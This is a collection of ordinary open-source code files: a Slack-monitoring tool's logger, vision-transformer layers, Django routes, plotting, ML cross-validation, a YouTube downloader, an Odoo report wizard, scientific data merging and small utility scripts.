self.workspace_format = logging.Formatter(\n '{\"timestamp\": \"%(asctime)s\", \"level\": \"WORKSPACE\", \"message\": %(message)s}')\n self.logger = logging.getLogger(self.name)\n self.handler = logging.StreamHandler(sys.stdout)\n self.logger.addHandler(self.handler)\n if kwargs.get('debug'):\n self.logger.setLevel(logging.DEBUG)\n else:\n self.logger.setLevel(logging.INFO)\n\n def bind(self):\n pass\n\n def log(self,\n level: str,\n log_data: str or Dict,\n **kwargs):\n if level.upper() == 'NOTIFY':\n self.handler.setFormatter(self.notify_format)\n self.logger.info(\n json.dumps(\n log_data,\n cls=EnhancedJSONEncoder),\n extra={\n 'scope': kwargs.get('scope', ''),\n 'type': kwargs.get('detect_type', ''),\n 'severity': kwargs.get('severity', '')})\n elif level.upper() == 'INFO':\n self.handler.setFormatter(self.info_format)\n self.logger.info(log_data)\n elif level.upper() == 'DEBUG':\n self.handler.setFormatter(self.info_format)\n self.logger.debug(log_data)\n elif level.upper() == 'USER':\n self.handler.setFormatter(self.user_format)\n self.logger.info(json.dumps(\n log_data,\n cls=EnhancedJSONEncoder))\n elif level.upper() == 'WORKSPACE':\n self.handler.setFormatter(self.workspace_format)\n self.logger.info(json.dumps(\n log_data,\n cls=EnhancedJSONEncoder))\n elif level.upper() == 'SUCCESS':\n self.handler.setFormatter(self.success_format)\n self.logger.info(log_data)\n else:\n self.handler.setFormatter(self.info_format)\n self.logger.critical(log_data)\n\n\nclass IsDataclass(Protocol):\n __dataclass_fields__: ClassVar[Dict]\n\n\ndef export_csv(csv_name: str, export_data: List[IsDataclass]) -> None:\n \"\"\" Export the data passed in a dataclass to CSV file\n\n Args:\n csv_name: Name of the CSV file to create\n export_data: Dataclass object to create CSV from\n \"\"\"\n try:\n headers = dataclasses.asdict(export_data[0]).keys()\n with open(f'{os.path.join(os.getcwd(), csv_name)}.csv', 'w') as f:\n writer = csv.DictWriter(f, fieldnames=headers)\n writer.writeheader()\n for item in export_data:\n writer.writerow(dataclasses.asdict(item))\n f.close()\n except Exception as e:\n print(e)\n","repo_name":"PaperMtn/slack-watchman","sub_path":"src/slack_watchman/sw_logger.py","file_name":"sw_logger.py","file_ext":"py","file_size_in_byte":12676,"program_lang":"python","lang":"en","doc_type":"code","stars":275,"dataset":"github-code","pt":"91"}
+{"seq_id":"70577499502","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport itertools\nfrom utils.timmfunc import DropPath\n\n\nclass PatchEmbedding(nn.Module):\n\n def __init__(self, patch_size=16, stride=16, padding=0,\n in_chans=3,embed_dim=768):\n super().__init__()\n self.proj = nn.Conv2d(in_chans,embed_dim, kernel_size=patch_size,\n stride=(stride,stride),padding=(padding,padding))\n self.norm = nn.BatchNorm2d(embed_dim)\n\n\n def forward(self, x):\n x = self.proj(x)\n x = self.norm(x)\n return x\n\n\nclass Flat(nn.Module):\n\n def __init__(self, ):\n super().__init__()\n\n def forward(self, x):\n x = x.flatten(2).transpose(1, 2)\n return x\n\n\nclass StemConv(nn.Module):\n\n def __init__(self,in_chs, out_chs):\n super(StemConv,self).__init__()\n self.conv1 = nn.Conv2d(in_chs, out_chs, kernel_size=2, stride=2, padding=0)\n self.batch1 = nn.BatchNorm2d(out_chs)\n self.act1 = nn.ReLU()\n # self.conv2 = nn.Conv2d(out_chs//2, out_chs,kernel_size=2, stride=2, padding=0)\n # self.batch2 = nn.BatchNorm2d(out_chs)\n # self.act2 = nn.ReLU()\n\n\n def forward(self, x):\n x = self.act1(self.batch1(self.conv1(x)))\n # x = self.act2(self.batch2(self.conv2(x)))\n return x\n\n\n\n# pool_size, stride=1, padding=pool_size // 2,\n\nclass MB4D(nn.Module):\n\n def __init__(self, in_chs, h_chs,out_chs):\n super(MB4D,self).__init__()\n self.pool = nn.AvgPool2d(kernel_size=3,stride=1,padding=1)\n self.conv1 = nn.Conv2d(in_chs,h_chs,stride=1, kernel_size=1)\n self.batch1 = nn.BatchNorm2d(h_chs)\n self.act = nn.GELU()\n self.conv2 = nn.Conv2d(h_chs,out_chs,stride=1,kernel_size=3,padding=1)\n self.batch2 = nn.BatchNorm2d(out_chs)\n \n\n def forward(self, x):\n x_h = self.pool(x) + x\n out = self.batch1(self.conv1(x_h))\n out = self.act(out)\n out = self.batch2(self.conv2(out))\n out = out + x_h\n\n return out\n\n\n\nclass Attention(torch.nn.Module):\n def __init__(self, dim=384, key_dim=32, num_heads=8,\n attn_ratio=4,\n resolution=7):\n super().__init__()\n self.num_heads = num_heads\n self.scale = key_dim ** -0.5\n self.key_dim = key_dim\n self.nh_kd = nh_kd = key_dim * num_heads\n self.d = int(attn_ratio * key_dim)\n self.dh = int(attn_ratio * key_dim) * num_heads\n self.attn_ratio = attn_ratio\n h = self.dh + nh_kd * 2\n\n self.qkv = nn.Linear(dim, h)\n self.proj = nn.Linear(self.dh, dim)\n\n points = list(itertools.product(range(resolution), range(resolution)))\n N = len(points)\n attention_offsets = {}\n idxs = []\n for p1 in points:\n for p2 in points:\n offset = (abs(p1[0] - p2[0]), abs(p1[1] - p2[1]))\n if offset not in attention_offsets:\n attention_offsets[offset] = len(attention_offsets)\n idxs.append(attention_offsets[offset])\n self.attention_biases = torch.nn.Parameter(\n torch.zeros(num_heads, len(attention_offsets)))\n self.register_buffer('attention_bias_idxs',\n torch.LongTensor(idxs).view(N, N))\n\n @torch.no_grad()\n def train(self, mode=True):\n super().train(mode)\n if mode and hasattr(self, 'ab'):\n del self.ab\n else:\n self.ab = self.attention_biases[:, self.attention_bias_idxs]\n\n def forward(self, x): # x (B,N,C)\n B, N, C = x.shape\n qkv = self.qkv(x)\n q, k, v = qkv.reshape(B, N, self.num_heads, -1).split([self.key_dim, self.key_dim, self.d], dim=3)\n\n \n\n q = q.permute(0, 2, 1, 3)\n k = k.permute(0, 2, 1, 3)\n v = v.permute(0, 2, 1, 3)\n\n\n \n\n attn = (\n (q @ k.transpose(-2, -1)) * self.scale\n # +\n # (self.attention_biases[:, self.attention_bias_idxs]\n # if self.training else self.ab)\n )\n attn = attn.softmax(dim=-1)\n x = (attn @ 
v).transpose(1, 2).reshape(B, N, self.dh)\n x = self.proj(x)\n return x\n\n\nclass MB3D(nn.Module):\n\n def __init__(self, dim, mlp_ratio=4.,\n act_layer=nn.GELU, norm_layer=nn.LayerNorm,\n drop=0., drop_path=0.,\n use_layer_scale=True, layer_scale_init_value=1e-5):\n\n super().__init__()\n\n self.norm1 = norm_layer(dim) \n self.token_mixer = Attention(dim)\n self.norm2 = norm_layer(dim)\n mlp_hidden_dim = int(dim * mlp_ratio)\n self.mlp = LinearMlp(in_features=dim, hidden_features=mlp_hidden_dim,\n act_layer=act_layer, drop=drop)\n\n self.drop_path = DropPath(drop_path) if drop_path > 0. \\\n else nn.Identity()\n self.use_layer_scale = use_layer_scale\n if use_layer_scale:\n self.layer_scale_1 = nn.Parameter(\n layer_scale_init_value * torch.ones((dim)), requires_grad=True)\n self.layer_scale_2 = nn.Parameter(\n layer_scale_init_value * torch.ones((dim)), requires_grad=True)\n\n def forward(self, x):\n if self.use_layer_scale:\n x = x + self.drop_path(\n self.layer_scale_1.unsqueeze(0).unsqueeze(0)\n * self.token_mixer(self.norm1(x)))\n x = x + self.drop_path(\n self.layer_scale_2.unsqueeze(0).unsqueeze(0)\n * self.mlp(self.norm2(x)))\n\n else:\n x = x + self.drop_path(self.token_mixer(self.norm1(x)))\n x = x + self.drop_path(self.mlp(self.norm2(x)))\n return x\n\nclass LinearMlp(nn.Module):\n \"\"\" MLP as used in Vision Transformer, MLP-Mixer and related networks\n \"\"\"\n\n def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, drop=0.):\n super().__init__()\n out_features = out_features or in_features\n hidden_features = hidden_features or in_features\n\n self.fc1 = nn.Linear(in_features, hidden_features)\n self.act = act_layer()\n self.drop1 = nn.Dropout(drop)\n self.fc2 = nn.Linear(hidden_features, out_features)\n self.drop2 = nn.Dropout(drop)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.drop1(x)\n x = self.fc2(x)\n x = self.drop2(x)\n return x","repo_name":"Inha-HCI/LifeOfTire","sub_path":"Efficientformer/layers/Efficientformer_l.py","file_name":"Efficientformer_l.py","file_ext":"py","file_size_in_byte":6470,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"}
+{"seq_id":"40960307047","text":"# coding=utf-8\nfrom django.conf.urls.defaults import patterns, include, url\nfrom dictionary.views import Index, Bibliography, About, Manual\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'synonyms.views.home', name='home'),\n # url(r'^synonyms/', include('synonyms.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n\n url(r'^$', Index.as_view()),\n url(r'^dictionaries/', Bibliography.as_view()),\n url(r'^about/', About.as_view()),\n url(r'^howto/', Manual.as_view()),\n)\n","repo_name":"Sereni/synonyms","sub_path":"synonyms/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"32565306461","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import font_manager as fm, rcParams\n\nfrom kivy.logger import Logger\n\nimport json, random\nimport jsonRequests\n\ndef multiplyColor(c, a): return tuple((i*a for i in c))\n\n\ndef nearColor(a, b):\n\tl = [abs(x-y) for (x,y) in zip(a,b)]\n\tthreshold = .05\n\tfor i in l:\n\t\tif i > threshold:\n\t\t\treturn False\n\treturn True\n\ndef checkColors(l, a):\n\tfor i in l:\n\t\tif nearColor(i, a):\n\t\t\treturn True\n\treturn False\n\n#Resolution\nwidth = 1920.0\nheight = 864.0\nDPI = float(72)\n\n#Bar Width\nbar_width = 0.8\n\n#Base color\nbase_color = (.280, .592, 1)\n\n\nplt.rc('font',family='serif')\nplt.rc('font',serif='Roboto')\n\n#title font\ntitleFont = {\"fontsize\":70, \"family\":'serif', \"weight\":\"light\"}\n\n\n#axis font\naxisFont = {\"fontsize\":30}\n\n\n\ndef saveImage(jsonData, outputFile):\n\n\tfig = plt.figure(figsize=(width/DPI, height/DPI), dpi=DPI)\n\tplt.ylim(ymax=10)\n\tnames = sorted([result[\"name\"] for result in jsonData[\"results\"]])\n\tpeople = []\n\tindex = 0\n\n\t##Iterate through everything and get the names of every account.\n\n\taccts = set()\n\tfor result in jsonData[\"results\"]:\n\t\tfor acct in result[\"accts\"]:\n\t\t\taccts.add(acct[\"name\"])\n\n\taccts = list(accts)\n\tinternals = [\"1 - SA - Internal\", \"2 - SA - App Dev\"]\n\n\tfor internal in internals:\n\t\tif internal in accts:\n\t\t\taccts.remove(internal)\n\n\tinternals.sort()\n\n\taccts = accts + internals\n\n\n\tcolorDict = {\"1 - SA - Internal\":(.5,.5,.5), \"2 - SA - App Dev\":(.7,.7,.7)} # Map account to color.\n\tusedColors = []\n\n\tbars = []\n\tacct_list = []\n\n\tLogger.info(\"Time Slip Grapher: Adding bars.\")\n\n\tperson_map = {}\n\n\tfor result in jsonData[\"results\"]:\n\t\tperson_map[result[\"name\"]] = 0\n\t\tif len(result[\"accts\"]) > 0:\n\t\t\tname = result[\"name\"]\n\t\t\tperson_map[name] = 0\n\t\t\tfor acct in result[\"accts\"]:\n\t\t\t\tperson_map[name] += acct[\"amount\"]\n\n\tresults = jsonData[\"results\"]\n\n\n\tresults.sort(key = lambda x: person_map[x[\"name\"]], reverse=True)\n\n\tfor result in results:\n\t\tif len(result[\"accts\"]) > 0:\n\t\t\tresource_name = result[\"name\"]\n\t\t\tpeople.append(resource_name)\n\t\t\tbottom = 0\n\t\t\tfor acct_name in accts:\n\t\t\t\tfor acct in result[\"accts\"]:\n\t\t\t\t\tif acct_name == acct[\"name\"]:\n\t\t\t\t\t\tname = acct[\"name\"]\n\n\t\t\t\t\t\tif name not in colorDict:\n\t\t\t\t\t\t\tc = base_color\n\t\t\t\t\t\t\twhile (checkColors(usedColors, c)):\n\t\t\t\t\t\t\t\tstrength = random.random()\n\t\t\t\t\t\t\t\tc = multiplyColor(base_color, strength)\n\t\t\t\t\t\t\tcolorDict[name]=c\n\t\t\t\t\t\t\tusedColors.append(c)\n\n\t\t\t\t\t\tcolor = colorDict[name]\n\t\t\t\t\t\tamt = acct[\"amount\"]\n\t\t\t\t\t\tp, = plt.bar(index, (amt), bar_width, bottom=bottom, color=color, label=name)\n\t\t\t\t\t\tif name not in acct_list:\n\t\t\t\t\t\t\tbars.append(p)\n\t\t\t\t\t\t\tacct_list.append(name)\n\t\t\t\n\t\t\t\t\t\tbottom = bottom + amt\n\n\t\t\tindex = index + 1\n\n\tplt.legend(handles=bars, labels=acct_list, loc=1, fontsize=\"large\")\n\n\tlow_bar_height = 4.5\n\n\tvalues = list([low_bar_height for i in range(len(people))])\n\n\tplt.plot(np.arange(len(people)), values , color=(0,0,0))\n\n\thigh_bar_height = 9\n\n\tvalues = list([high_bar_height for i in range(len(people))])\n\n\tplt.plot(np.arange(len(people)), values , color=(0,0,0))\n\n\tplt.title('Time Slip Leaderboard',fontdict=titleFont)\n\tplt.tick_params(axis='both', 
which='major', labelsize=14)\n\tplt.xticks(np.arange(len(people)), people)\n\tplt.yticks(np.arange(0, 12, 2))\n\tplt.ylabel('Hours Spent', fontdict = axisFont)\n\n\tLogger.info(\"Time Slip Grapher: Saving...\")\n\n\tplt.savefig(outputFile)\n\n\tLogger.info(\"Time Slip Grapher: Done!\")\n\ndef getJsonData():\n\turl = \"https://www.softwareanywhere.com/services/apexrest/TimeSlips\"\n\tresponse = jsonRequests.getResponse(url)\n\tif response.status:\n\t\tparsed = json.loads(response.raw.decode('string-escape').strip('\"'))\n\t\treturn parsed\n\telse:\n\t\treturn False\n\n\nif __name__ == \"__main__\":\n\tjsonData = getJsonData()\n\tsaveImage(jsonData, \"testGraph.png\")\n\n","repo_name":"nvblueboy/Work-TV","sub_path":"TimeSlipGraphUtility.py","file_name":"TimeSlipGraphUtility.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"30976799590","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 8 16:54:29 2021\nThis module defines the function that runs the the neural network model\nand runs a group k-fold cross validation\nThe output is a series of lists with accuracy values and predictor\nimportance of each fold\nUse the shap module for predictor importance\n@author: Javier Muro\n\"\"\"\nfrom sklearn.model_selection import GroupKFold\n#from sklearn import metrics\n\nimport numpy as np\nimport pandas as pd\n#import scipy as sp\n#import tensorflow as tf\n#from tensorflow import keras\nfrom keras.callbacks import EarlyStopping\n#from tensorflow.keras import layers\nfrom tensorflow.keras.layers.experimental import preprocessing\n\nfrom scipy.stats import gaussian_kde\nimport matplotlib.pyplot as plt\n\n\n#Import function to display loss\nfrom plot_loss import plot_loss\n\n#Preprocess data\nimport be_preprocessing \nimport modelDNN\n\n# create list to store results\npred_trues = []\ntestfeatures_order2 = []\n\n\ndef gkfold_DNN(EPOCHS, studyvar):\n # Create an object with the result of the preprocessing module\n Mydataset = be_preprocessing.be_preproc(studyvar)[0]\n\n #Create y (labels) and x (features)\n epg = Mydataset['ep']\n x_columns = Mydataset.columns.drop([studyvar, 'ep'])\n x = Mydataset[x_columns].values\n y = Mydataset[studyvar].values\n \n # K-fold Cross Validation model evaluation\n gkf = GroupKFold(n_splits=5)\n #EPOCHS = 200\n \n fold = 0\n for split, (train, test) in enumerate(gkf.split(x, y, groups=epg)):\n fold+=1\n print(f'Fold#{fold}')\n \n train_features = x[train]\n train_labels = y[train]\n test_features = x[test]\n test_labels = y[test]\n \n # We have to extract the test features in the same order than\n # they are split, so that we can link the predictions to the\n # original dataset\n # This only works if all combinations of training features are unique\n # which is the case (impossible to have identical combinations)\n testfeatures_order= pd.DataFrame(test_features)\n testfeatures_order.columns = x_columns\n testfeatures_order2.append(testfeatures_order)\n \n #######################################################################\n # Normalzation\n #######################################################################\n \n #Create normalizer layer and adapt it to our data\n normalizer = preprocessing.Normalization()\n normalizer.adapt(np.array(train_features))\n \n #######################################################################\n # Important note: the model module is imported outside the loop\n # But the function that builds it is run inside the loop, so that\n # the model is rebuild with each fold.\n # If the model is build outside the loop, it will learn with each fold\n # and we don't want that\n model = modelDNN.build_model(normalizer, train_features)\n #model.summary()\n #######################################################################\n \n #Add an early stopping to avoid overfitting\n es = EarlyStopping(monitor='val_loss', mode='min', verbose=1, patience=50)\n \n #Train model\n #Keras fit function expects training features to be as array.\n history = model.fit(\n train_features, \n train_labels, \n epochs=EPOCHS, \n validation_split = 0.2, \n verbose=0\n ,callbacks=[es]\n )\n \n #######################################################################\n #Plot errors\n # Show last few epochs in history\n hist = pd.DataFrame(history.history)\n hist['epoch'] = history.epoch\n \n #plot_loss(history, EPOCHS, studyvar)\n \n #Predictions\n #Make predictions on 
the test data using the model, and stored results of each fold\n test_predictions = model.predict(test_features).flatten()\n \n \n c = pd.concat([pd.Series(test_labels), pd.Series(test_predictions)], axis=1)\n c.columns = ['labels', 'preds']\n pred_trues.append(c)\n \n yy = c['preds']\n xx = c['labels']\n \n # Calculate the point density\n xxyy = np.vstack([xx,yy])\n z = gaussian_kde(xxyy)(xxyy)\n \n fig, ax = plt.subplots()\n ax.scatter(xx, yy, c=z, s=100)\n \n\n plt.ylabel(f'Predicted {studyvar}')\n plt.xlabel(f'In situ {studyvar}')\n #add a r=1 line\n line = np.array([0,max(Mydataset[studyvar])])\n plt.plot(line,line,lw=1, c=\"black\")\n plt.show() \n \n return model\n \n# if __name__ == \"__main__\":\n# gkfold_DNN(EPOCHS, studyvar)\n\n","repo_name":"Havi-muro/SeBAS_project","sub_path":"gkfold_DNN.py","file_name":"gkfold_DNN.py","file_ext":"py","file_size_in_byte":4826,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"91"}
+{"seq_id":"16011030406","text":"from pytube import YouTube\r\nimport sys\r\n\r\nif len(sys.argv) < 2:\r\n print(\"Usage: python YoutubeDownloader.py <youtube link>\")\r\n sys.exit(1)\r\n\r\nlink = sys.argv[1]\r\nyt = YouTube(link)\r\n\r\nprint(\"Title: \", yt.title)\r\nprint(\"Views: \", yt.views)\r\n\r\nyd = yt.streams.get_highest_resolution()\r\nyd.download(r\"C:\\Users\\Mitko\\Desktop\\videos\")\r\n\r\n# To run the program, from a terminal: python YoutubeDownloader.py \"youtube link\"\r\n \r\n","repo_name":"RootBeerOverflow/Youtube-video-downloader","sub_path":"YoutubeDownloader.py","file_name":"YoutubeDownloader.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"377716034","text":"from odoo import _, api, fields, models\nfrom odoo.exceptions import UserError, ValidationError\n\n\nclass WizardHolidaysCount(models.TransientModel):\n _name = \"wizard.holidays.count\"\n _description = \"Wizard Report of number of holidays\"\n\n name = fields.Char()\n\n date_from = fields.Date(required=True)\n date_to = fields.Date(required=True)\n\n employee_ids = fields.Many2many(\"hr.employee\")\n\n department_id = fields.Many2one(\"hr.department\", string=\"Department\")\n category_ids = fields.Many2many(\"hr.employee.category\", string=\"Tag\")\n\n @api.model\n def default_get(self, fields):\n res = super().default_get(fields)\n if self.env.user.employee_ids:\n res[\"department_id\"] = self.env.user.employee_ids[0].department_id.id\n return res\n\n def _prepare_employee_domain(self):\n res = []\n if self.category_ids:\n res.append((\"category_ids\", \"in\", self.category_ids.ids))\n if self.department_id:\n res.append((\"department_id\", \"child_of\", self.department_id.id))\n return res\n\n def populate(self):\n domain = self._prepare_employee_domain()\n self.employee_ids = self.env[\"hr.employee\"].search(domain)\n action = self.get_formview_action()\n action[\"target\"] = \"new\"\n return action\n\n def print_report(self):\n self.ensure_one()\n [data] = self.read()\n if not data.get(\"employee_ids\"):\n raise UserError(\n _(\"You have to select at least one Employee and try again.\")\n )\n datas = {\"ids\": self.ids, \"model\": self._name, \"form\": data}\n return self.env.ref(\n \"cb_number_of_holidays_report.action_report_holidays_count\"\n ).report_action(self, data=datas)\n\n @api.constrains(\"date_from\", \"date_to\")\n def check_date(self):\n for record in self:\n if (\n record.date_from\n and record.date_to\n and record.date_from > record.date_to\n ):\n raise ValidationError(\n _(\"The start date must be earlier than the end date.\")\n )\n","repo_name":"tegin/cb-hr","sub_path":"cb_number_of_holidays_report/wizards/wizard_holidays_count.py","file_name":"wizard_holidays_count.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"74416007663","text":"#!/usr/bin/python3\n\"\"\"Script that displays X-Request-Id variable\"\"\"\n\nfrom sys import argv\nimport requests\n\nif __name__ == \"__main__\":\n\n url = argv[1]\n\n req = requests.get(url)\n head_dict = req.headers\n for key, value in head_dict.items():\n if key == \"X-Request-Id\":\n print(head_dict[key])\n","repo_name":"MDIMACat/alx-higher_level_programming","sub_path":"0x11-python-network_1/5-hbtn_header.py","file_name":"5-hbtn_header.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"6996460","text":"# file to merge data and output?\nimport xarray as xr\nimport numpy as np\nimport scipy.io\nfrom scipy import integrate\nfrom scipy.interpolate import griddata\nimport datetime as dt\nimport pandas as pd\nimport pickle\nimport pdb\nfrom netCDF4 import Dataset, date2num, num2date\n#\n# Need to get current time\natime=dt.datetime.now()\n#\n#current_year=2022\ncurrent_year=atime.year\n#current_month=12\ncurrent_month=atime.month\n#\n# deal with case of january: use all twelve months of the previous year (indices 0-11)\nif current_month==1:\n current_year=current_year-1\n lastmonth=12\nelse:\n lastmonth=current_month\n#\nnummonth=np.arange(0,lastmonth)\n#\nmons=['january','february','march','april','may','june','july','august','september','october','november','december']\nabigtime=[]\nabigtemp=[]\nfor i in nummonth:\n fname='/home/flbahr/heat_content/wcofs_'+mons[i]+'_'+str(current_year)+'.p'\n thefile=open(fname,'rb')\n [time,temp]=pickle.load(thefile)\n if i==0:\n abigtime=time\n abigtemp=temp\n else:\n abigtime=np.append(abigtime,time)\n abigtemp=np.vstack((abigtemp,temp))\n#\n# this is just to load the latitude and longitude arrays so the year can be hard coded.\nroms_ds=xr.open_dataset('/home/flbahr/heat_content/WCOFS_SST_2022.nc',decode_cf=True)\nlat=roms_ds['lat']\nlon=roms_ds['lon']\nlatitude=lat\nlongitude=lon\n#\nstring_year=str(current_year)\ndims=['time','lat','lon']\nds=xr.Dataset({'wcofs_temperature':(dims,abigtemp)},\n coords={'time':abigtime,\n 'lon':longitude,\n 'lat':latitude,\n })\nds.attrs['title']='WCOFS SST UCSC ROMS grid '+string_year\nds.attrs['notes']=\"Created on \"+dt.datetime.today().strftime(\"%Y-%m-%d\")+\" by flbahr, interpolated onto UCSC grid\"\nfname=\"/home/flbahr/heat_content/WCOFS_SST_\"+string_year+\".nc\"\nds.to_netcdf(path=fname)\n","repo_name":"CeNCOOS/UCSC-WCROMS-Heat-Wave","sub_path":"wcof_merge_data.py","file_name":"wcof_merge_data.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"21036673932","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom .base_model_ import Model\nfrom datetime import date, datetime\nfrom typing import List, Dict\nfrom ..util import deserialize_model\n\n\nclass Body(Model):\n \"\"\"\n NOTE: This class is auto generated by the swagger code generator program.\n Do not edit the class manually.\n \"\"\"\n def __init__(self, favorite: bool=None):\n \"\"\"\n Body - a model defined in Swagger\n\n :param favorite: The favorite of this Body.\n :type favorite: bool\n \"\"\"\n self.swagger_types = {\n 'favorite': bool\n }\n\n self.attribute_map = {\n 'favorite': 'favorite'\n }\n\n self._favorite = favorite\n\n @classmethod\n def from_dict(cls, dikt) -> 'Body':\n \"\"\"\n Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The body of this Body.\n :rtype: Body\n \"\"\"\n return deserialize_model(dikt, cls)\n\n @property\n def favorite(self) -> bool:\n \"\"\"\n Gets the favorite of this Body.\n\n :return: The favorite of this Body.\n :rtype: bool\n \"\"\"\n return self._favorite\n\n @favorite.setter\n def favorite(self, favorite: bool):\n \"\"\"\n Sets the favorite of this Body.\n\n :param favorite: The favorite of this Body.\n :type favorite: bool\n \"\"\"\n if favorite is None:\n raise ValueError(\"Invalid value for `favorite`, must not be `None`\")\n\n self._favorite = favorite\n\n","repo_name":"saintaxl/swaggy-jenkins","sub_path":"clients/python-flask/generated/swagger_server/models/body.py","file_name":"body.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"91"}
+{"seq_id":"14407580664","text":"\n# coding: utf-8\n\n# In[13]:\n\n# Taken directly from http://stackoverflow.com/questions/10526579/use-scikit-learn-to-classify-into-multiple-categories\nimport numpy as np\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.svm import LinearSVC\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn import preprocessing\n\n\n# In[3]:\n\nX_train = np.array([\"new york is a hell of a town\",\n \"new york was originally dutch\",\n \"the big apple is great\",\n \"new york is also called the big apple\",\n \"nyc is nice\",\n \"people abbreviate new york city as nyc\",\n \"the capital of great britain is london\",\n \"london is in the uk\",\n \"london is in england\",\n \"london is in great britain\",\n \"it rains a lot in london\",\n \"london hosts the british museum\",\n \"new york is great and so is london\",\n \"i like london better than new york\"])\n\n\n# In[4]:\n\ny_train = [[0],[0],[0],[0],[0],[0],[1],[1],[1],[1],[1],[1],[0,1],[0,1]]\n\n\n# In[5]:\n\nX_test = np.array(['nice day in nyc',\n 'welcome to london',\n 'hello welcome to new york. enjoy it here and london too'])\n\n\n# In[6]:\n\ntarget_names = ['New York', 'London']\n\n\n# In[9]:\n\nclassifier = Pipeline([\n ('vectorizer', CountVectorizer()),\n ('tfidf', TfidfTransformer()),\n ('clf', OneVsRestClassifier(LinearSVC()))])\n\n\n# In[10]:\n\n# Binarize the per-sample label lists into a multilabel indicator matrix;\n# OneVsRestClassifier expects this format (this also uses the previously\n# unused preprocessing import).\nmlb = preprocessing.MultiLabelBinarizer()\nY_train = mlb.fit_transform(y_train)\n\nclassifier.fit(X_train, Y_train)\npredicted = classifier.predict(X_test)\n\n\n# In[11]:\n\n# inverse_transform maps each indicator row back to a tuple of label ids\nfor item, labels in zip(X_test, mlb.inverse_transform(predicted)):\n print('%s => %s' % (item, ', '.join(target_names[x] for x in labels)))\n\n","repo_name":"emgrasmeder/datascience-pres","sub_path":"classification_intro.py","file_name":"classification_intro.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"91"}
+{"seq_id":"25781591916","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n\r\n# Hive Administration Scripts\r\n# Copyright (c) 2008-2020 Hive Solutions Lda.\r\n#\r\n# This file is part of Hive Administration Scripts.\r\n#\r\n# Hive Administration Scripts is free software: you can redistribute it and/or modify\r\n# it under the terms of the Apache License as published by the Apache\r\n# Foundation, either version 2.0 of the License, or (at your option) any\r\n# later version.\r\n#\r\n# Hive Administration Scripts is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# Apache License for more details.\r\n#\r\n# You should have received a copy of the Apache License along with\r\n# Hive Administration Scripts. If not, see .\r\n\r\n__author__ = \"João Magalhães \"\r\n\"\"\" The author(s) of the module \"\"\"\r\n\r\n__version__ = \"1.0.0\"\r\n\"\"\" The version of the module \"\"\"\r\n\r\n__revision__ = \"$LastChangedRevision$\"\r\n\"\"\" The revision number of the module \"\"\"\r\n\r\n__date__ = \"$LastChangedDate$\"\r\n\"\"\" The last change date of the module \"\"\"\r\n\r\n__copyright__ = \"Copyright (c) 2008-2020 Hive Solutions Lda.\"\r\n\"\"\" The copyright for the module \"\"\"\r\n\r\n__license__ = \"Apache License, Version 2.0\"\r\n\"\"\" The license for the module \"\"\"\r\n\r\nimport os\r\nimport sys\r\n\r\nimport legacy\r\n\r\nNT_PLATFORM = \"nt\"\r\n\"\"\" The nt platform reference string value to be\r\nused in operating system detection \"\"\"\r\n\r\nDOS_PLATFORM = \"dos\"\r\n\"\"\" The dos platform used as a fallback reference\r\nvalue for operating system detection mechanisms \"\"\"\r\n\r\nWINDOWS_PLATFORMS = (NT_PLATFORM, DOS_PLATFORM)\r\n\"\"\" The windows platform values that may be used\r\nto detect any environment running any version of windows \"\"\"\r\n\r\nLONG_PATH_PREFIX = legacy.UNICODE(\"\\\\\\\\?\\\\\")\r\n\"\"\" The windows long path prefix, used for special\r\nconstruction of path values in windows \"\"\"\r\n\r\nIGNORE_FILE = \".cignore\"\r\n\"\"\" The name of the file that is going to be used to determine\r\nif a path tree should be ignored and no operation should be\r\nperformed for any of its children \"\"\"\r\n\r\ndef handle_ignore(names):\r\n \"\"\"\r\n Tries to handle the ignore operation for the provided\r\n set of names, this should include the changing of the\r\n names list in case it's required.\r\n\r\n :type names: List\r\n :param names: The list of directory names that are meant\r\n to be verified/handled for the ignore file.\r\n :rtype: bool\r\n :return: If the ignore operation has been processed for\r\n the current list of 